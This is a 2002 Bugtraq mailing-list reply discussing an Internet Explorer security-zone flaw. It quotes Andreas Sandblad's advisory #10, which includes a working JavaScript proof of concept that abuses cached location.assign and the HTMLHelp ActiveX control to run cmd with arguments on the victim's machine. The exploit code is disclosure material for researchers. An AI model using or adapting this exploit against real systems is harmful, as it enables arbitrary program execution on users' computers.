RE: How to execute programs with parameters in IE - Sandblad advisory #10

From: Thor Larholm (thor@pivx.com)
Date: 11/07/02


From: "Thor Larholm" <thor@pivx.com>
To: <bugtraq@securityfocus.com>, "Andreas Sandblad" <sandblad@acc.umu.se>
Date: Thu, 7 Nov 2002 10:53:28 +0100

Unless I am missing something, this is definitely not a vulnerability in
itself but just a practical demonstration of the "assign method caching"
vulnerability.

Executing programs with or without parameters also become pointless once you
have complete access to a local security zone (in this case, given by the
"assign method caching" vuln), as demonstrated by http-equiv quite some
times. Circumventing the zone barriers allow you to (among others) retrieve
the location of that funny malware you just planted in the users temporary
internet files, and subsequently execute it.

The HTMLHelp Control used in this example only has the authority to execute
commands at all because it is being used from a local security zone. As
such, when Microsoft are claiming that "the technique used to run programs
with parameters from the "Local computer zone" was no security
vulnerability", they are in my opinion correct.
Despite this, it is always interesting to have more approaches to program
execution for demonstratory purposes once you get your foot inside the door
of a local security zone, especially since the "codebase localpath" approach
is practically filtered anywhere in its pure form.

IE6 SP1 did include some early attempts at preventing any interaction
between security zones (specifically from the Internet zone to any local
zone). That attempt was broken with the object redirect approach. It will be
interesting to see what Microsoft comes up with next to prevent interaction
between security zones.

Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?
http://www.PivX.com

-----Original Message-----
From: Andreas Sandblad [mailto:sandblad@acc.umu.se]
Sent: 6. november 2002 20:48
To: bugtraq@securityfocus.com
Subject: How to execute programs with parameters in IE - Sandblad
advisory #10
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
       'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  setTimeout('run()',1000);
}
function run() {
  f("javascript:document.write('<object id=c1 classid=clsid:adb"+
   "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
   "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
   "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
   "-00aa003b7a11><param name=Command value=Close></object>')");
  f("javascript:c1.Click();c2.Click();");
  close();
}
</script>
--------------------------- CUT HERE ---------------------------